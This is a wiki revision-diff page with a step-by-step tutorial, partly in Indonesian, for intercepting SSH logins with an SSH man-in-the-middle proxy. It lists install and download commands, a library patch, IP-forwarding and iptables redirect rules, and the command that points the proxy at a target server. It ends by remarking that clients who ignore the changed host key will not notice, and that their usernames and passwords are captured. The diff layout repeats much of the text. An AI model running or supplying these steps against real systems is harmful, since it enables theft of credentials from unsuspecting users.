Difference between revisions of "MITM: mitm ssh"
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| Line 38: | Line 38: | ||
| − | + | ==Diagram== | |
| − | + | ||
| − | client --> mitmproxy --> ssh server | + | client --> mitmproxy --> ssh server |
- target server ip: 192.168.202.124 | - target server ip: 192.168.202.124 | ||
| − | + | ==Instalasi== | |
| − | $ sudo pip install twisted | + | |
| − | $ sudo apt-get install python-service-identity | + | $ sudo pip install twisted |
| − | $ pip install pycrypto | + | $ sudo apt-get install python-service-identity |
| + | $ pip install pycrypto | ||
| + | |||
| + | |||
| + | ==Download== | ||
| − | + | $ git clone https://github.com/saironiq/mitmproxy.git | |
| − | $ git clone https://github.com/saironiq/mitmproxy.git | ||
3- if you can not run mitmreplay_ssh, it might be there is changing structure of pycrypto of the version you install, so | 3- if you can not run mitmreplay_ssh, it might be there is changing structure of pycrypto of the version you install, so | ||
| Line 63: | Line 66: | ||
$ cd mitmproxy | $ cd mitmproxy | ||
$ sudo ./mitmproxy | $ sudo ./mitmproxy | ||
| + | |||
| + | ==update firewall== | ||
5- update ip_forward rule and nat | 5- update ip_forward rule and nat | ||
| − | $ sudo sysctl -w net.ipv4.ip_forward=1 | + | $ sudo sysctl -w net.ipv4.ip_forward=1 |
| − | $ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222 | + | $ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222 |
6- run the mitmproxy_ssh and point to target server 192.168.202.124 | 6- run the mitmproxy_ssh and point to target server 192.168.202.124 | ||
| Line 74: | Line 79: | ||
- snapshot of username and password on our mitmproxy pc when client ssh to server 192.168.202.124 | - snapshot of username and password on our mitmproxy pc when client ssh to server 192.168.202.124 | ||
| − | |||
| − | |||
| − | |||
==Referensi== | ==Referensi== | ||
Revision as of 07:04, 7 April 2017
sumber: http://www.atechnote.com/2016/10/intercept-username-and-password-using.html
Download
git clone https://github.com/mitmproxy/mitmproxy.git
Generate Keys
./mitmkeys
Ini akan masuk ke ~/.mitmkeys
Instal SSH key yang akan di serang
#Install SSH key ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver
Jalankan proxy
Then run the proxy, pointing it at the victimserver.
./mitmproxy_ssh -H victimserver
This runs the proxy on localhost:2222
Now simply connect to the local proxy:
ssh localhost -p 2222
And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.
Diagram
client --> mitmproxy --> ssh server
- target server ip: 192.168.202.124
Instalasi
$ sudo pip install twisted $ sudo apt-get install python-service-identity $ pip install pycrypto
Download
$ git clone https://github.com/saironiq/mitmproxy.git
3- if you can not run mitmreplay_ssh, it might be there is changing structure of pycrypto of the version you install, so - modify file mitmproxy/mitmproxy/sshdebug.py
-- line 655 modify it to below
mpints.append(cnumber.bytes_to_long(
-- line 11 add the following line
from Crypto.Util import number as cnumber
4- generate keys $ cd mitmproxy $ sudo ./mitmproxy
update firewall
5- update ip_forward rule and nat
$ sudo sysctl -w net.ipv4.ip_forward=1 $ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
6- run the mitmproxy_ssh and point to target server 192.168.202.124 $ sudo ./mitmproxy_ssh -H 192.168.202.124 -s
7- now when our client login to ssh server, if they the don't suspect the new key from server, it is very transparent to client
- snapshot of username and password on our mitmproxy pc when client ssh to server 192.168.202.124